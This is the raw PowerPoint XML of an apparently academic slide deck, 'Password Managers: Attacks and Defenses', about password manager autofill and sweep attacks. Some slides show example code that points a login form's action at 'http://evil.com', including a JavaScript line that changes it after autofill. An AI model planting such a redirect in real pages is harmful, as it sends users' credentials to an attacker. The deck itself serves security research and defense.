            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1700"/>
                <a:t>HTTPS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13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99657" y="5222067"/>
            <a:ext cx="774092" cy="7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4409169" y="4258735"/>
            <a:ext cx="41864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Automatic Autofill:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Shape 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052808" y="2235200"/>
            <a:ext cx="19437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At Save:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Shape 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8496335" y="2235200"/>
            <a:ext cx="12316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Now:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Shape 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641856" y="3077742"/>
            <a:ext cx="476567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&lt;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form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 action=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solidFill>
                  <a:srgbClr val="007600"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>login.php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"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Shape 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3006469" y="6578258"/>
            <a:ext cx="7118929" cy="212912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000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternatively, what if action is changed by JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> autofilling?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3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000" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> form.action = “http://evil.com”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3" animBg="1" advAuto="0"/>
      <p:bldP spid="127" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="130" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="131" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="132" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="136" grpId="6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952500" y="338063"/>
            <a:ext cx="11099800" cy="1520974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="461518">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4740" b="1"/>
              <a:t>Should we autofill?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="461518">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4740"/>
              <a:t>Different form action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Shape 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6300587" y="3077742"/>
            <a:ext cx="562312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&lt;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form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 action=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solidFill>
                  <a:srgbClr val="F33126"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://evil.com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"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&gt;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6381681" y="9239250"/>
            <a:ext cx="241403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 defTabSz="457200"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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8177" y="5302111"/>
            <a:ext cx="774092" cy="774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aosp-ico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3666" y="5307515"/>
            <a:ext cx="763282" cy="7632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145"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3203016" y="5296474"/>
            <a:ext cx="1134498" cy="979579"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1134496" cy="979577"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="143" name="pasted-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85364" cy="785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4" name="Shape 144"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="360406" y="623977"/>
              <a:ext cx="77409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700"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1700"/>
                <a:t>HTTPS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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3304" y="5331919"/>
            <a:ext cx="774091" cy="71447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3006469" y="6578258"/>
            <a:ext cx="7118929" cy="2129127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000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternatively, what if action is changed by JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> autofilling?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> form.action = “http://evil.com”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Shape 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409169" y="4294428"/>
            <a:ext cx="41864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Automatic Autofill:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Shape 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052808" y="2236376"/>
            <a:ext cx="19437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At Save:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Shape 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8496335" y="2235200"/>
            <a:ext cx="12316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3600" b="1"/>
              <a:t>Now:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Shape 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641856" y="3077742"/>
            <a:ext cx="476567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&lt;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form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> action=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“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="007600"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="080101"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="google-chrome-logo-transparent-backgroun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45052" y="5266313"/>
            <a:ext cx="785364" cy="785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astpass_large_logo_05061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44478" y="5260781"/>
            <a:ext cx="796427" cy="796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firefox-512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334562" y="5290943"/>
            <a:ext cx="796428" cy="796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Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>214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White</vt:lpstr>
      <vt:lpstr>Password Managers: Attacks and Defenses</vt:lpstr>
      <vt:lpstr>A tool for…</vt:lpstr>
      <vt:lpstr>Password Manager Workflow</vt:lpstr>
      <vt:lpstr>Manual Autofill</vt:lpstr>
      <vt:lpstr>Automatic Autofill</vt:lpstr>
      <vt:lpstr>Should we autofill?</vt:lpstr>
      <vt:lpstr>Should we autofill? The contestants</vt:lpstr>
      <vt:lpstr>Should we autofill? Different form action</vt:lpstr>
      <vt:lpstr>Should we autofill? Different form action</vt:lpstr>
      <vt:lpstr>Should we autofill? Click through HTTPS warning</vt:lpstr>
      <vt:lpstr>Should we autofill? iFrame not same-origin with parent</vt:lpstr>
      <vt:lpstr>Sweep Attacks</vt:lpstr>
      <vt:lpstr>Threat Model: Coffee-shop Attacker</vt:lpstr>
      <vt:lpstr>Obligatory Food Example</vt:lpstr>
      <vt:lpstr>Redirect Sweep Attack on HTTP Login Page</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTTP Login Pages</vt:lpstr>
      <vt:lpstr>Attacking HTTPS</vt:lpstr>
      <vt:lpstr>Other sweep attacks (see paper)</vt:lpstr>
      <vt:lpstr>Sweep Attacks Vulnerability</vt:lpstr>
      <vt:lpstr>Defending against sweep attacks</vt:lpstr>
      <vt:lpstr>Defense #1: Manual Autofill as secure as manual entry</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Defense #2: Secure Filling more secure than manual entry</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>AJAX </vt:lpstr>
      <vt:lpstr>Disclosure</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>HTTP Login Pages</vt:lpstr>
      <vt:lpstr>What about strength checkers?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 Managers: Attacks and Defenses</dc:title>
  <cp:lastModifiedBy>David Silver</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-08-21T21:52:06Z</dcterms:modified>
</cp:coreProperties>
</file>